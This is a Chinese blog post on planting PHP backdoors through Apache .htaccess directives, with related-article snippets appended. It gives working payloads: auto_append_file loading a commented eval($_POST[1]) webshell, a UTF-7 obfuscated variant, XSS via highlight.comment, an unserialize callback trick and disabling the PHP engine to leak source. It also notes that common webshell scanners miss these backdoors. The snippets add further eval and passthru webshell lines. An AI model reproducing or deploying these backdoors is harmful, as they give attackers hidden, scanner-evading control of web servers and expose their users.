xss添加php后门,利用.Htaccess文件构成的PHP后门

最新推荐文章于 2022-07-09 10:57:15 发布
最新推荐文章于 2022-07-09 10:57:15 发布
阅读量347 收藏 2
点赞数
文章标签: xss添加php后门

0x00 .Htaccess简介

.htaccess 是Apache HTTP Server的文件目录系统级别的配置文件的默认的名字。它提供了在主配置文件中定义用户自定义指令的支持。 这些配置指令需要在 .htaccess 上下文 和用户需要的适当许可。

平时开发用的最多的就是URL重定向功能。

0x01 开启.htaccess

Apache中修改配置文件httpd.conf

修改如下内容

Options FollowSymLinks

AllowOverride None

为:

Options FollowSymLinks

AllowOverride All

开启rewrite模块

LoadModule rewrite_module modules/mod_rewrite.so

后门篇

文件包含

.htaccess:

php_value auto_append_file D:/wamp/www/1.txt

*.php

XSS后门

.htaccess:

php_value highlight.comment '"><script>alert(1);</script>'

*.php

PHP后门

.htaccess:

php_value auto_append_file .htaccess

#<?php eval($_POST[1]);

*.php .htaccess:

php_flag zend.multibyte 1

php_value zend.script_encoding "UTF-7"

php_value auto_append_file .htaccess

#+ADw-script+AD4-alert(1)+ADsAPA-/script+AD4 #+ADw?php phpinfo()+Ads

*.php .htaccess:

php_value unserialize_callback_func "phpinfo"

index.php:

unserialize('O:1:"1":0:{}');

类似的回调函数都是可以的,过此处phpinfo要怎么调用才能运行任意代码还没研究出来。

任意文件下载

.htaccess:

php_flag engine 0

*.php

0x03 webshell查杀

目前使用了D盾webshell查杀、SeayFindShell等工具对这个都没有查杀效果。不过也都是一些简单的一句话木马了,很容易被入库干掉。自己写了一个伪装成mysql调试文件的PHP木马,感觉好用多了。

weixin_39611725
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php处理xss攻击过滤.rar
01-18
然而,随着互联网技术的发展,安全问题也日益突出,其中XSS(跨站脚本攻击)是常见的安全威胁之一。XSS攻击允许攻击者通过注入恶意脚本到网页中,从而获取用户的敏感信息,例如登录凭据或执行其他恶意操作。为了防御...
小识.htaccess文件
aijie6150的博客
10-18 314
.htaccess文件(或者"分布式配置文件")提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包含一个或多个指令的文件, 以作用于此目录及其所有子目录。作为用户,所能使用的命令受到限制。管理员可以通过Apache的AllowOverride指令来设置。 概述来说,htaccess文件是Apache服务器中的一个配置文件,它负责相关目录下的网页配置。通过ht...
.htaccess文件构成PHP后门
浅笑996的博客
06-28 2681
1、.htaccess文件 2、文件上传绕过 一般.htaccess可以用来留后门和针对黑名单绕过 创建一个txt入(png解析为php) AddTypeapplication/x-httpd-php.png 另存为.htaccess 上传.htaccess 必须是网站根路径 3、留后门 可以在.htaccess 加入php解析规则 类似于把文件名包含1的解析成php <FilesMatch"1"> SetHandlerapplication/x-http...
xss为什么不能用php,php – HTML的用户输入是向其他人显示的,而不是HTML转义的XSS的一个例子...
weixin_28956461的博客
03-31 76
我是PHP开发人员,我希望提高我的网站的安全性.从我了解以下是影响Web应用程序的两种主要的漏洞类型:> SQL注入> XSSSQL注入可以用准备的语句来修复 – 容易.但我还是没有真正得到XSS – 以下是XSS的一个例子?>完整的用户自定义内容的页面上有一个登录表单(站点范围).>用户对页面的输入不是HTML转义的.> A用户发布以下内容(例如评论)到页面…A r...
.htaccess后门
weixin_30764883的博客
01-17 180
PHP手册,常看常新:) PHP有个特性,会根据apache的httpd.conf和.htaccess来覆盖自己php.ini的设置. 恰好,找到两个邪恶的属性: auto_prepend_file string 指定在主文件之前自动解析的文件名。该文件就像调用了 include() 函数一样被包含进来,因此会使用 include_path。 特殊值 none 禁止了自动前缀。 au...
Python中常见文件操作,纯干货
a1309525802的博客
09-04 6550
Python文件操作一、关于文件二、读文件简单操作三、文件权限四、文件高级操作五、大文件的读取基本方法常用函数 一、关于文件 文件的作用:把一些数据储存起来 使用文件流程: 打开文件,读文件,关闭文件 二、读文件简单操作 1.读取文件 #打开文件 file = open("demo1/1.txt",mode="r") #读取文件 ret = file.read() #file只是变量,read是读取函数 print(ret) #关闭文件 file.close() #第一个参数的文件的路
基于PHP的Spy2022WEB后门程序源码.zip
最新发布
08-28
标题 "基于PHP的Spy2022WEB后门程序源码.zip" 提示我们这是一个包含PHP后门程序源代码的压缩文件后门程序通常是在网站或服务器上秘密植入的代码,允许攻击者未经授权地访问、控制或窃取数据。在IT安全领域,理解和...
xss防御之php利用httponly防xss攻击
12-19
这样就减少了攻击者利用XSS窃取用户身份信息、管理员凭证等敏感数据的风险。 在PHP中,有多种方式可以设置HTTPOnly Cookie: 1. **全局开启**:在`php.ini`配置文件中,可以设置`session.cookie_httponly = 1`来...
xss.js.zip
07-29
此外,"xss.js"提供了可扩展的接口,允许开发者添加自定义的过滤规则和处理逻辑。这在应对一些特殊场景或者新的安全威胁时非常有用,开发者可以通过这些接口实现更细致的安全控制,如对特定标签的特殊处理或者引入第...
基于PHP的htaccess Editor htaccess在线生成器收藏版.zip
07-20
使用PHP和在线生成器处理.htaccess时,必须注意避免SQL注入、XSS攻击等安全问题。同时,确保所有规则都经过充分测试,以免误操作导致网站功能异常。 6. **最佳实践** - 定期备份:在修改.htaccess前,做好现有...
apache不能解析php文件_Apache中.htaccess文件利用的总结与新思路拓展
weixin_39760068的博客
11-12 241
在普遍使用的LAMP架构中,Apache与PHP之间的交互,有三种常见的方式。第一种是最通用最常见的Module方式,即在httpd.conf中使用LoadModule的方式,将php的dll或者so文件加载到apache当中。还有两种是CGI方式和FastCGI方式。其实后者用的越来越广泛了。一般PHP-FPM也是与FastCGI进行配合使用的。可以参考CGI、FastCGI和PHP-FPM关系...
web安全攻防中xss平台部署中的.htaccess问题
yqlhac的博客
12-16 764
XSS平台部署之.htaccess静态配置问题建立.htaccess文件后访问127.0.0.1/xss 返回404解决方法 建立.htaccess文件后访问127.0.0.1/xss 返回404 这时可以去查看Apache下的error.log文件 打开查看,如果有如下的记录: T:/phpstudy/php/PHPTutorial/WWW/XSS/ [Wed Dec 16 17:38:06.134247 2020] [rewrite:error] [pid 16120:tid 2040] [clie
新建一个xss.php文件,XSS攻击的原理和利用以及防范
weixin_31746993的博客
03-21 483
原理1.反射型新建一个xss.php文件并加入以下代码:1. \\XSS反射演示2. 3. 4. 5. 6.
xss文件上传下载学习完毕(自用总结)
hk41666的博客
07-09 1206
自用比较
XSS能有什么危害?
weixin_42299862的博客
10-12 4573
上次学习了一篇很好的文章以后,了https://blog.csdn.net/weixin_42299862/article/details/108518706这么一篇读后感~现在继续总结一下,XSS能造成多大的危害。 1、cookie劫持 通过XSS漏洞,我们可以轻易的将javascript代码注入被攻击用户的页面并用浏览器执行。 如果用户的cookie没有设置Httponly,在javascript中可以通过“document.cookie”来获取用户的cookie内容,并可以轻易的发送到任意黑客指定的
.htaccess实际运用案例之过滤URL特殊字符,防止XSS攻击
gongpeng1966的专栏
04-12 5937
验证过的,但还有一些用escape编码过的url参数不能有效过滤
XSS(跨站脚本攻击)原理详解(内含攻击实例)
qq_52642385的博客
07-05 6979
军锋真人cs野战123平台、xss平台(推荐自行搭建xss平台,不让别人白嫖咱自个的成果,蓝莲花战队的那个就挺好)、webshell箱子、postman、beef(kali上可能要自行下载,三行命令即可)、burpsuite、xsstrike【内含软件使用方法】原理:前端提交的一些参数转换为js代码,可以回显一些东西跨站:例如你将一段攻击代码通过留言存储到对方服务器上时,对方管理员在浏览时就可能会执行你所的攻击语句。产生层面:前端函数类:一般应用js里面的一些输出类函数但是会受浏览器内核影响,一些浏览器会
.htaccess做更隐蔽的后门
weixin_34269583的博客
05-21 198
作者:kindle From:http://key0.cn/?p=285 万恶的引用功能,下文复制粘贴无用,请自行将双引号修改 .htaccess内容如下 #首先允许web访问这个文件 <Files ~ “^\.ht”> Order allow,deny Allow from all </Files> RedirectMatch ...
.htaccess 后门
weixin_30512089的博客
08-11 289
<?php <Files ~ "^\.ht"> Order allow,deny Allow from all </Files> AddType application/x-httpd-php .htaccess # <?php @eval($_GET[value]);?> # or <?php passthru($_GET['c...
xss .htaccess apache
07-27
要防止XSS攻击,您可以添加以下代码到.htaccess文件中: ``` <IfModule mod_headers.c> Header set X-XSS-Protection "1; mode=block" Header set X-Content-Type-Options "nosniff" <IfModule mod_rewrite.c> ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值